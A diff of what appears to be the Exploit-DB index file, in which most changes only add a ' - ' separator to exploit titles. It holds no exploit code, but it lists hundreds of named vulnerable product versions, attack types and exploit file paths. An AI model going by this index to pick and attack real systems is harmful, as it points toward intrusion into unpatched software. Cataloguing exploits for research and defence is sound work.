25811,platforms/hardware/webapps/25811.py,"YeaLink IP Phone Firmware 9.70.0.100 - Unauthenticated Phone Call",2013-05-29,b0rh,hardware,webapps,0 25812,platforms/hardware/webapps/25812.txt,"TP-Link IP Cameras Firmware 1.6.18P12 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25813,platforms/hardware/webapps/25813.txt,"MayGion IP Cameras Firmware 09.27 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 -25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab ActiveX Heap Overflow",2013-05-29,Metasploit,windows,remote,0 +25814,platforms/windows/remote/25814.rb,"IBM SPSS SamplePower C1Tab - ActiveX Heap Overflow",2013-05-29,Metasploit,windows,remote,0 25815,platforms/hardware/webapps/25815.txt,"Zavio IP Cameras Firmware 1.6.03 - Multiple Vulnerabilities",2013-05-29,"Core Security",hardware,webapps,0 25826,platforms/php/webapps/25826.txt,"ATutor 1.4.3 - browse.php show_course Parameter XSS",2005-06-16,Lostmon,php,webapps,0 25827,platforms/php/webapps/25827.txt,"ATutor 1.4.3 - contact.php subject Parameter XSS",2005-06-16,Lostmon,php,webapps,0 @@ -22988,11 +22988,11 @@ id,file,description,date,author,platform,type,port 25847,platforms/asp/webapps/25847.txt,"LaGarde StoreFront 5.0 Shopping Cart LOGIN.ASP SQL Injection",2003-12-07,G00db0y,asp,webapps,0 25848,platforms/php/webapps/25848.pl,"PAFaq beta4 Database Unauthorized Access",2005-06-20,james,php,webapps,0 25849,platforms/php/webapps/25849.txt,"PhpTax 0.8 - File Manipulation(newvalue_field) Remote Code Execution",2013-05-31,"CWH Underground",php,webapps,0 -26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts Arbitrary Remote Command Execution Vulnerabilities",2005-08-21,sullo@cirt.net,cgi,webapps,0 +26289,platforms/cgi/webapps/26289.txt,"Alkalay.Net Multiple Scripts - Arbitrary Remote Command Execution Vulnerabilities",2005-08-21,sullo@cirt.net,cgi,webapps,0 26290,platforms/cgi/webapps/26290.txt,"PerlDiver 2.31 - Perldiver.CGI Cross-Site Scripting",2005-08-21,"Donnie Werner",cgi,webapps,0 26291,platforms/asp/webapps/26291.txt,"Mall23 AddItem.ASP SQL Injection",2005-08-21,SmOk3,asp,webapps,0 26292,platforms/osx/dos/26292.html,"Microsoft Internet Explorer 5.2.3 for Mac OS Denial of Service",2005-08-22,"Mella Marco",osx,dos,0 -25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 db_netserver Stack Buffer Overflow",2013-05-31,Metasploit,windows,remote,8001 +25851,platforms/windows/remote/25851.rb,"Lianja SQL 1.0.0RC5.1 - db_netserver Stack Buffer Overflow",2013-05-31,Metasploit,windows,remote,8001 25852,platforms/multiple/dos/25852.py,"ModSecurity Remote Null Pointer Dereference",2013-05-31,"Younes JAAIDI",multiple,dos,0 25853,platforms/asp/webapps/25853.txt,"I-Gallery Folder Argument Directory Traversal",2005-06-20,"Seyed Hamid Kashfi",asp,webapps,0 25854,platforms/php/webapps/25854.txt,"PAFaq Question Cross-Site Scripting",2005-06-20,"James Bercegay",php,webapps,0 @@ -23067,9 +23067,9 @@ id,file,description,date,author,platform,type,port 25921,platforms/windows/dos/25921.txt,"Raven Software Soldier Of Fortune 2 Ignore Command Remote Denial of Service",2005-06-29,"Luigi Auriemma",windows,dos,0 25922,platforms/asp/webapps/25922.txt,"CyberStrong EShop 4.2 20review.ASP SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25923,platforms/asp/webapps/25923.txt,"CyberStrong eShop 4.2 10expand.ASP SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 -25926,platforms/php/webapps/25926.txt,"OSTicket 1.2/1.3 view.php inc Variable Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 +25926,platforms/php/webapps/25926.txt,"OSTicket 1.2/1.3 view.php inc Variable - Arbitrary Local File Inclusion",2005-06-30,"edisan & foster",php,webapps,0 25924,platforms/asp/webapps/25924.txt,"fsboard 2.0 - Directory Traversal",2005-06-30,ActualMInd,asp,webapps,0 -25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 10browse.ASP SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 +25925,platforms/asp/webapps/25925.txt,"CyberStrong EShop 4.2 - 10browse.ASP SQL Injection",2005-06-30,aresu@bosen.net,asp,webapps,0 25928,platforms/php/webapps/25928.txt,"EasyPHPCalendar 6.1.5/6.2.x - calendar.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25929,platforms/php/webapps/25929.txt,"EasyPHPCalendar 6.1.5/6.2.x - popup.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 25930,platforms/php/webapps/25930.txt,"EasyPHPCalendar 6.1.5/6.2.x - header.inc.php serverPath Parameter Remote File Inclusion",2005-07-04,"Albania Security Clan",php,webapps,0 @@ -23086,7 +23086,7 @@ id,file,description,date,author,platform,type,port 25941,platforms/php/webapps/25941.txt,"MyGuestbook 0.6.1 - Form.Inc.php3 Remote File Inclusion",2005-07-05,"SoulBlack Group",php,webapps,0 25942,platforms/php/webapps/25942.txt,"JAWS 0.x - Remote File Inclusion",2005-07-06,"Stefan Esser",php,webapps,0 25943,platforms/linux/dos/25943.txt,"OFTPD 0.3.x - User Command Buffer Overflow",2005-07-06,new.security@gmail.com,linux,dos,0 -25944,platforms/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 Mail Template Automatic Script Execution",2005-07-06,shalom@venera.com,multiple,remote,0 +25944,platforms/multiple/remote/25944.txt,"IBM Lotus Domino Notes 6.0/6.5 - Mail Template Automatic Script Execution",2005-07-06,shalom@venera.com,multiple,remote,0 25945,platforms/php/webapps/25945.txt,"phpWebsite 0.7.3/0.8.x/0.9.x - Index.php Directory Traversal",2005-07-06,"Diabolic Crab",php,webapps,0 25946,platforms/jsp/webapps/25946.txt,"McAfee IntruShield Security Management System - Multiple Vulnerabilities",2005-07-06,c0ntex,jsp,webapps,0 25947,platforms/linux/local/25947.txt,"GNU GNATS 4.0/4.1 - Gen-Index Arbitrary Local File Disclosure/Overwrite",2005-07-06,pi3ki31ny,linux,local,0 @@ -23119,7 +23119,7 @@ id,file,description,date,author,platform,type,port 25976,platforms/hardware/webapps/25976.txt,"DS3 - Authentication Server - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",hardware,webapps,0 25977,platforms/jsp/webapps/25977.txt,"Imperva SecureSphere Operations Manager 9.0.0.5 - Multiple Vulnerabilities",2013-06-05,"Pedro Andujar",jsp,webapps,0 25978,platforms/hardware/webapps/25978.txt,"Netgear DGN1000 / DGN2200 - Multiple Vulnerabilities",2013-06-05,"Roberto Paleari",hardware,webapps,80 -25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content CheckOutAndOpen.dll ActiveX Remote Code Execution",2013-06-05,Metasploit,windows,remote,0 +25979,platforms/windows/remote/25979.rb,"Oracle WebCenter Content - CheckOutAndOpen.dll ActiveX Remote Code Execution",2013-06-05,Metasploit,windows,remote,0 25980,platforms/multiple/remote/25980.rb,"Apache Struts - includeParams Remote Code Execution",2013-06-05,Metasploit,multiple,remote,8080 25981,platforms/asp/webapps/25981.txt,"Hosting Controller 6.1 - Multiple SQL Injection",2005-07-13,"Soroush Dalili",asp,webapps,0 25982,platforms/cfm/webapps/25982.txt,"Simple Message Board 2.0 beta1 Forum.CFM Cross-Site Scripting",2005-07-14,rUnViRuS,cfm,webapps,0 @@ -23135,7 +23135,7 @@ id,file,description,date,author,platform,type,port 25992,platforms/windows/dos/25992.txt,"Microsoft Internet Explorer 5.0.1 JPEG Image Rendering CMP Fencepost Denial of Service",2005-07-15,"Michal Zalewski",windows,dos,0 25993,platforms/linux/local/25993.sh,"Skype Technologies Skype 0.92/1.0/1.1 - Insecure Temporary File Creation",2005-07-18,"Giovanni Delvecchio",linux,local,0 25994,platforms/php/webapps/25994.txt,"OSCommerce 2.2 - Update.php Information Disclosure",2005-07-18,"Andrew Hunter",php,webapps,0 -25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",php,webapps,0 +25995,platforms/php/webapps/25995.txt,"e107 Website System 0.6 - Nested BBCode URL Tag Script Injection",2005-07-18,"Nick Griffin",php,webapps,0 25996,platforms/php/webapps/25996.txt,"RuubikCMS 1.1.1 - Stored XSS",2013-06-07,expl0i13r,php,webapps,0 25997,platforms/php/webapps/25997.txt,"tForum b0.9 Member.php Cross-Site Scripting",2005-07-18,wannacut,php,webapps,0 25998,platforms/hardware/webapps/25998.txt,"Asus RT56U 3.0.0.4.360 - Remote Command Injection",2013-06-07,drone,hardware,webapps,0 @@ -23207,7 +23207,7 @@ id,file,description,date,author,platform,type,port 26063,platforms/php/webapps/26063.txt,"Naxtor Shopping Cart 1.0 - Lost_password.php Cross-Site Scripting",2005-08-02,"John Cobb",php,webapps,0 26064,platforms/php/webapps/26064.txt,"Naxtor Shopping Cart 1.0 Shop_Display_Products.php SQL Injection",2005-08-02,"John Cobb",php,webapps,0 26065,platforms/cfm/webapps/26065.txt,"Fusebox 4.1 - Index.CFM Cross-Site Scripting",2005-08-03,N.N.P,cfm,webapps,0 -26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 KS File Arbitrary Python Command Execution",2005-07-31,"Radovan Garabík",cgi,webapps,0 +26066,platforms/cgi/webapps/26066.txt,"Karrigell 1.x/2.0/2.1 KS File - Arbitrary Python Command Execution",2005-07-31,"Radovan Garabík",cgi,webapps,0 26067,platforms/php/webapps/26067.txt,"Web Content Management validsession.php strRootpath Parameter XSS",2005-08-03,rgod,php,webapps,0 26068,platforms/php/webapps/26068.txt,"Web Content Management List.php strTable Parameter XSS",2005-08-03,rgod,php,webapps,0 26069,platforms/asp/webapps/26069.txt,"Naxtor E-directory 1.0 Message.ASP Cross-Site Scripting",2005-08-03,basher13,asp,webapps,0 @@ -23234,12 +23234,12 @@ id,file,description,date,author,platform,type,port 26087,platforms/php/webapps/26087.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 jax_calendar.php Multiple Parameter XSS",2005-08-05,Lostmon,php,webapps,0 26088,platforms/php/webapps/26088.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 shrimp_petition.php Multiple Parameter XSS",2005-08-05,Lostmon,php,webapps,0 26089,platforms/php/webapps/26089.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 guestbook File Client IP Disclosure",2005-08-05,Lostmon,php,webapps,0 -26090,platforms/php/webapps/26090.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 guestbook_ips2block Banned IP List Disclosure",2005-08-05,Lostmon,php,webapps,0 -26091,platforms/php/webapps/26091.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 ips2block Banned IP List Disclosure",2005-08-05,Lostmon,php,webapps,0 +26090,platforms/php/webapps/26090.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - guestbook_ips2block Banned IP List Disclosure",2005-08-05,Lostmon,php,webapps,0 +26091,platforms/php/webapps/26091.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - ips2block Banned IP List Disclosure",2005-08-05,Lostmon,php,webapps,0 26092,platforms/php/webapps/26092.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 logfile.csv User IP Disclosure",2005-08-05,Lostmon,php,webapps,0 26093,platforms/php/webapps/26093.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 formmailer.log User Sent Mail Disclosure",2005-08-05,Lostmon,php,webapps,0 -26094,platforms/php/webapps/26094.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 ips2block Banned IP Disclosure",2005-08-05,Lostmon,php,webapps,0 -26095,platforms/php/webapps/26095.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 petitionbook Script User IP Disclosure",2005-08-05,Lostmon,php,webapps,0 +26094,platforms/php/webapps/26094.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 - ips2block Banned IP Disclosure",2005-08-05,Lostmon,php,webapps,0 +26095,platforms/php/webapps/26095.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 petitionbook Script - User IP Disclosure",2005-08-05,Lostmon,php,webapps,0 26096,platforms/php/webapps/26096.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 suggestions.csv User IP Disclosure",2005-08-05,Lostmon,php,webapps,0 26097,platforms/php/webapps/26097.txt,"Jax PHP Scripts 1.0/1.34/2.14/3.31 jnl_records User Database Disclosure",2005-08-05,Lostmon,php,webapps,0 26098,platforms/php/webapps/26098.txt,"FlatNuke 2.5.5 structure.php Multiple Parameter XSS",2005-08-05,rgod,php,webapps,0 @@ -23295,7 +23295,7 @@ id,file,description,date,author,platform,type,port 26148,platforms/php/webapps/26148.txt,"MyBulletinBoard RC4 member.php Multiple Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26149,platforms/php/webapps/26149.txt,"MyBulletinBoard RC4 polls.php polloptions Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 26150,platforms/php/webapps/26150.txt,"MyBulletinBoard RC4 - search.php action Parameter SQL Injection",2005-08-12,phuket,php,webapps,0 -26151,platforms/windows/remote/26151.txt,"Isemarket JaguarControl ActiveX Control Buffer Overflow",2005-08-13,"Tacettin Karadeniz",windows,remote,0 +26151,platforms/windows/remote/26151.txt,"Isemarket JaguarControl - ActiveX Control Buffer Overflow",2005-08-13,"Tacettin Karadeniz",windows,remote,0 26152,platforms/osx/remote/26152.txt,"Apple Mac OS X 10.4 Weblog Server - Cross-Site Scripting",2005-08-15,"Donnie Werner",osx,remote,0 26153,platforms/php/webapps/26153.txt,"My Image Gallery 1.4.1 - index.php Multiple Parameter XSS",2005-08-16,anonymous,php,webapps,0 26154,platforms/asp/webapps/26154.txt,"PersianBlog Userslist.ASP SQL Injection",2005-08-16,trueend5,asp,webapps,0 @@ -23311,11 +23311,11 @@ id,file,description,date,author,platform,type,port 26164,platforms/php/webapps/26164.txt,"PHPTB Topic Board 2.0 - dev_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26165,platforms/php/webapps/26165.txt,"PHPTB Topic Board 2.0 - file_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 26166,platforms/php/webapps/26166.txt,"PHPTB Topic Board 2.0 - tech_o.php absolutepath Parameter Remote File Inclusion",2005-08-17,"Filip Groszynski",php,webapps,0 -26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET msdds.dll Remote Code Execution",2005-08-17,anonymous,windows,remote,0 +26167,platforms/windows/remote/26167.pl,"Microsoft Visual Studio .NET - msdds.dll Remote Code Execution",2005-08-17,anonymous,windows,remote,0 26168,platforms/hardware/remote/26168.txt,"Juniper Netscreen 5.0 - VPN Username Enumeration",2005-08-18,"Roy Hills",hardware,remote,0 26169,platforms/php/webapps/26169.txt,"W-Agora 4.2 Site Parameter Directory Traversal",2005-08-18,matrix_killer,php,webapps,0 26170,platforms/php/webapps/26170.txt,"ATutor 1.5.1 - login.php course Parameter XSS",2005-08-18,matrix_killer,php,webapps,0 -26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 Prod.php Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0 +26171,platforms/php/webapps/26171.php,"PHPOutsourcing Zorum 3.5 Prod.php - Arbitrary Command Execution",2005-08-18,rgod,php,webapps,0 26172,platforms/php/webapps/26172.txt,"Mantis 0.x/1.0 - Multiple Input Validation Vulnerabilities",2005-08-19,anonymous,php,webapps,0 26173,platforms/windows/dos/26173.txt,"AXIS Media Control 6.2.10.11 - Unsafe ActiveX Method",2013-06-13,"Javier Repiso Sánchez",windows,dos,0 26174,platforms/hardware/webapps/26174.txt,"Airlive IP Cameras - Multiple Vulnerabilities",2013-06-13,"Sánchez, Lopez, Castillo",hardware,webapps,0 @@ -23331,15 +23331,15 @@ id,file,description,date,author,platform,type,port 26184,platforms/php/webapps/26184.txt,"PHPKit 1.6.1 - Multiple SQL Injection",2005-08-22,phuket,php,webapps,0 26185,platforms/osx/local/26185.txt,"Apple Mac OS X 10.4 dsidentity Directory Services Account Creation and Deletion",2005-08-15,"Neil Archibald",osx,local,0 26186,platforms/php/webapps/26186.txt,"RunCMS 1.1/1.2 NewBB_Plus and Messages Modules Multiple SQL Injection",2005-08-22,"James Bercegay",php,webapps,0 -26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b Comments Module moderate Parameter XSS",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 -26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b user.php htmltext Parameter XSS",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 +26187,platforms/php/webapps/26187.txt,"PostNuke 0.76 RC4b - Comments Module moderate Parameter XSS",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 +26188,platforms/php/webapps/26188.txt,"PostNuke 0.76 RC4b - user.php htmltext Parameter XSS",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26189,platforms/php/webapps/26189.txt,"PostNuke 0.75/0.76 DL-viewdownload.php SQL Injection",2005-08-22,"Maksymilian Arciemowicz",php,webapps,0 26190,platforms/php/webapps/26190.txt,"SaveWebPortal 3.4 - Unauthorized Access",2005-08-23,rgod,php,webapps,0 26191,platforms/php/webapps/26191.txt,"SaveWebPortal 3.4 - Multiple Remote File Inclusion",2005-08-23,rgod,php,webapps,0 26192,platforms/php/webapps/26192.txt,"SaveWebPortal 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2005-08-23,rgod,php,webapps,0 26193,platforms/php/webapps/26193.txt,"SaveWebPortal 3.4 - Multiple Directory Traversal Vulnerabilities",2005-08-23,rgod,php,webapps,0 26194,platforms/windows/dos/26194.txt,"LeapFTP Client 2.7.3/2.7.4 LSQ File Remote Buffer Overflow",2005-08-24,Sowhat,windows,dos,0 -26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 InputTrap Local Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0 +26195,platforms/linux/local/26195.txt,"QNX RTOS 6.1/6.3 InputTrap Local - Arbitrary File Disclosure",2005-08-24,"Julio Cesar Fort",linux,local,0 26196,platforms/windows/remote/26196.txt,"BEA WebLogic 7.0/8.1 - Administration Console Cross-Site Scripting",2005-08-24,GomoR,windows,remote,0 26197,platforms/php/webapps/26197.txt,"Foojan PHPWeblog Html Injection",2005-08-24,ali202,php,webapps,0 26198,platforms/linux/remote/26198.txt,"Astaro Security Linux 6.0 01 HTTP CONNECT Unauthorized Access Weakness",2005-08-25,"Oliver Karow",linux,remote,0 @@ -23353,9 +23353,9 @@ id,file,description,date,author,platform,type,port 26206,platforms/php/webapps/26206.txt,"Land Down Under 700/701/800/801 events.php c Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26207,platforms/php/webapps/26207.txt,"Land Down Under 700/701/800/801 list.php Multiple Parameter SQL Injection",2005-08-29,matrix_killer,php,webapps,0 26208,platforms/php/webapps/26208.txt,"AutoLinks 2.1 Pro - Al_initialize.php Remote File Inclusion",2005-08-29,4Degrees,php,webapps,0 -26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0 +26209,platforms/php/webapps/26209.txt,"PHP-Fusion 4.0/5.0/6.0 - BBCode URL Tag Script Injection",2005-08-29,slacker4ever_1,php,webapps,0 26210,platforms/multiple/remote/26210.txt,"bfcommand & control server 1.22/2.0/2.14 manager - Multiple Vulnerabilities",2005-08-29,"Luigi Auriemma",multiple,remote,0 -26211,platforms/php/webapps/26211.txt,"phpldapadmin 0.9.6/0.9.7 welcome.php custom_welcome_page Variable Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 +26211,platforms/php/webapps/26211.txt,"phpldapadmin 0.9.6/0.9.7 welcome.php custom_welcome_page Variable - Arbitrary File Inclusion",2005-08-30,rgod,php,webapps,0 26212,platforms/php/webapps/26212.txt,"FlatNuke 2.5.6 ID Parameter Directory Traversal",2005-08-31,rgod,php,webapps,0 26213,platforms/php/webapps/26213.txt,"LibrettoCMS 2.2.2 - Arbitrary File Upload",2013-06-14,"CWH Underground",php,webapps,0 26214,platforms/windows/dos/26214.py,"Easy LAN Folder Share 3.2.0.100 - Buffer Overflow",2013-06-14,ariarat,windows,dos,0 @@ -23365,7 +23365,7 @@ id,file,description,date,author,platform,type,port 26218,platforms/linux/local/26218.txt,"Frox 0.7.18 - Arbitrary Configuration File Access",2005-09-01,rotor,linux,local,0 26219,platforms/windows/dos/26219.c,"WhitSoft Development SlimFTPd 3.17 - Remote Denial of Service",2005-09-02,"Critical Security",windows,dos,0 26220,platforms/windows/dos/26220.c,"FileZilla 2.2.15 - FTP Client Hard-Coded Cipher Key",2005-09-02,m123303@richmond.ac.uk,windows,dos,0 -26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger ActiveX Control Information Disclosure",2005-09-05,"Gregory R. Panakkal",windows,remote,0 +26221,platforms/windows/remote/26221.txt,"Rediff Bol 7.0 Instant Messenger - ActiveX Control Information Disclosure",2005-09-05,"Gregory R. Panakkal",windows,remote,0 26222,platforms/windows/local/26222.c,"Microsoft Windows 2000/2003/XP - Keyboard Event Privilege Escalation Weakness",2005-08-06,"Andres Tarasco",windows,local,0 26223,platforms/php/webapps/26223.txt,"Land Down Under 601/602/700/701/800/801 Events.php HTML Injection",2005-09-06,conor.e.buckley,php,webapps,0 26224,platforms/php/webapps/26224.txt,"Unclassified NewsBoard 1.5.3 Description Field HTML Injection",2005-09-06,retrogod@aliceposta.it,php,webapps,0 @@ -23402,7 +23402,7 @@ id,file,description,date,author,platform,type,port 26257,platforms/php/webapps/26257.txt,"ATutor 1.5.1 Password_Reminder.php SQL Injection",2005-09-14,rgod,php,webapps,0 26258,platforms/php/webapps/26258.txt,"ATutor 1.5.1 Chat Logs Remote Information Disclosure",2005-09-14,rgod,php,webapps,0 26259,platforms/php/webapps/26259.txt,"Noah's Classifieds 1.2/1.3 - Index.php SQL Injection",2005-09-14,trueend5,php,webapps,0 -26260,platforms/php/webapps/26260.txt,"TWiki TWikiUsers Remote Arbitrary Command Execution",2005-09-14,B4dP4nd4,php,webapps,0 +26260,platforms/php/webapps/26260.txt,"TWiki TWikiUsers Remote - Arbitrary Command Execution",2005-09-14,B4dP4nd4,php,webapps,0 26261,platforms/php/webapps/26261.txt,"Noah's Classifieds 1.3 - Index.php Cross-Site Scripting",2005-09-14,trueend5,php,webapps,0 26262,platforms/php/webapps/26262.txt,"Digital Scribe 1.4 Login SQL Injection",2005-09-15,rgod,php,webapps,0 26263,platforms/php/webapps/26263.txt,"AEwebworks aeDating 3.2/4.0 - Search_Result.php SQL Injection",2005-09-15,alexsrb,php,webapps,0 @@ -23411,8 +23411,8 @@ id,file,description,date,author,platform,type,port 26266,platforms/php/webapps/26266.txt,"DeluxeBB 1.0 - forums.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26267,platforms/php/webapps/26267.txt,"DeluxeBB 1.0 pm.php uid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 26268,platforms/php/webapps/26268.txt,"DeluxeBB 1.0 newpost.php fid Parameter SQL Injection",2005-09-15,abducter,php,webapps,0 -26333,platforms/asp/webapps/26333.html,"Aenovo /password/default.asp password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 -26334,platforms/asp/webapps/26334.txt,"aeNovo /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 +26333,platforms/asp/webapps/26333.html,"Aenovo - /password/default.asp password Field SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 +26334,platforms/asp/webapps/26334.txt,"aeNovo - /incs/searchdisplay.asp strSQL Parameter SQL Injection",2005-10-07,"farhad koosha",asp,webapps,0 26270,platforms/php/webapps/26270.txt,"Content2Web 1.0.1 - Multiple Input Validation Vulnerabilities",2005-09-16,"Security Tester",php,webapps,0 26271,platforms/osx/dos/26271.txt,"Apple Safari 1.x/2.0.1 Data URI Memory Corruption",2005-09-17,"Jonathan Rockway",osx,dos,0 26272,platforms/php/webapps/26272.txt,"EPay Pro 2.0 - Index.php Directory Traversal",2005-09-19,h4cky0u,php,webapps,0 @@ -23433,7 +23433,7 @@ id,file,description,date,author,platform,type,port 26287,platforms/php/webapps/26287.txt,"PHP Advanced Transfer Manager 1.30 - Multiple Cross-Site Scripting Vulnerabilities",2005-09-20,rgod,php,webapps,0 26300,platforms/php/webapps/26300.txt,"LucidCMS 2.0 - Index.php Cross-Site Scripting",2005-09-27,X1ngBox,php,webapps,0 26301,platforms/windows/dos/26301.txt,"Novell GroupWise 6.5.3 Client Local Integer Overflow",2005-09-27,"Francisco Amato",windows,dos,0 -26302,platforms/php/webapps/26302.txt,"TWiki TWikiUsers INCLUDE Function Remote Arbitrary Command Execution",2005-09-28,JChristophFuchs,php,webapps,0 +26302,platforms/php/webapps/26302.txt,"TWiki TWikiUsers INCLUDE Function Remote - Arbitrary Command Execution",2005-09-28,JChristophFuchs,php,webapps,0 26303,platforms/php/webapps/26303.txt,"CubeCart 3.0.3 - index.php Multiple Parameter XSS",2005-09-28,Lostmon,php,webapps,0 26304,platforms/php/webapps/26304.txt,"CubeCart 3.0.3 cart.php redir Parameter XSS",2005-09-28,Lostmon,php,webapps,0 26305,platforms/php/webapps/26305.txt,"SquirrelMail 1.4.2 Address Add Plugin Add.php Cross-Site Scripting",2005-09-29,anonymous,php,webapps,0 @@ -23444,7 +23444,7 @@ id,file,description,date,author,platform,type,port 26310,platforms/php/webapps/26310.txt,"IceWarp Web Mail 5.5.1 calendar_m.html createdataCX Parameter XSS",2005-09-30,ss_contacts,php,webapps,0 26311,platforms/php/webapps/26311.txt,"IceWarp Web Mail 5.5.1 calendar_w.html createdataCX Parameter XSS",2005-09-30,ss_contacts,php,webapps,0 26312,platforms/php/webapps/26312.txt,"EasyGuppy 4.5.4/4.5.5 Printfaq.php Directory Traversal",2005-09-30,"Josh Zlatin-Amishav",php,webapps,0 -26313,platforms/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r Arbitrary File Deletion",2005-09-30,ShineShadow,php,webapps,0 +26313,platforms/php/webapps/26313.txt,"Merak Mail Server 8.2.4 r - Arbitrary File Deletion",2005-09-30,ShineShadow,php,webapps,0 26386,platforms/php/webapps/26386.txt,"Nuked-Klan 1.7 Forum Module Multiple Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26387,platforms/php/webapps/26387.txt,"Nuked-Klan 1.7 Sections Module artid Parameter SQL Injection",2005-10-24,papipsycho,php,webapps,0 26316,platforms/php/webapps/26316.php,"imacs CMS 0.3.0 - Unrestricted File Upload Exploit",2013-06-19,"CWH Underground",php,webapps,0 @@ -23590,15 +23590,15 @@ id,file,description,date,author,platform,type,port 26462,platforms/cgi/webapps/26462.txt,"Simple PHP Blog 0.4 preview_static_cgi.php Multiple Parameter XSS",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26463,platforms/cgi/webapps/26463.txt,"Simple PHP Blog 0.4 colors.php Multiple Parameter XSS",2005-11-02,enji@infosys.tuwien.ac.at,cgi,webapps,0 26464,platforms/windows/remote/26464.txt,"IPSwitch WhatsUp Small Business 2004 Report Service Directory Traversal",2005-11-03,"Dennis Rand",windows,remote,0 -26465,platforms/php/webapps/26465.txt,"CuteNews 1.4.1 show_archives.php template Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 -26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 show_news.php template Parameter Traversal Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 +26465,platforms/php/webapps/26465.txt,"CuteNews 1.4.1 show_archives.php template Parameter Traversal - Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 +26466,platforms/php/webapps/26466.txt,"CuteNews 1.4.1 show_news.php template Parameter Traversal - Arbitrary File Access",2005-11-02,retrogod@aliceposta.it,php,webapps,0 26467,platforms/php/webapps/26467.txt,"PHP Handicapper Process_signup.php HTTP Response Splitting",2005-11-03,BiPi_HaCk,php,webapps,0 26468,platforms/php/webapps/26468.pl,"Galerie 2.4 ShowGallery.php SQL Injection",2005-11-03,abducter_minds@yahoo.com,php,webapps,0 26469,platforms/php/webapps/26469.txt,"JPortal Web Portal 2.2.1/2.3.1 - comment.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 26470,platforms/php/webapps/26470.txt,"JPortal Web Portal 2.2.1/2.3.1 news.php id Parameter SQL Injection",2005-11-04,Mousehack,php,webapps,0 26471,platforms/windows/remote/26471.py,"PCMan's FTP Server 2.0.7 - Buffer Overflow Exploit",2013-06-27,"Jacob Holcomb",windows,remote,21 26473,platforms/asp/webapps/26473.txt,"Ocean12 ASP Calendar Manager 1.0 - Authentication Bypass",2005-11-04,syst3m_f4ult,asp,webapps,0 -26474,platforms/php/webapps/26474.txt,"PHPFM Arbitrary File Upload",2005-11-07,rUnViRuS,php,webapps,0 +26474,platforms/php/webapps/26474.txt,"PHPFM - Arbitrary File Upload",2005-11-07,rUnViRuS,php,webapps,0 26475,platforms/cgi/webapps/26475.txt,"Asterisk 0.x/1.0/1.2 Voicemail Unauthorized Access",2005-11-07,"Adam Pointon",cgi,webapps,0 26476,platforms/php/webapps/26476.txt,"OSTE 1.0 - Remote File Inclusion",2005-11-07,khc@bsdmail.org,php,webapps,0 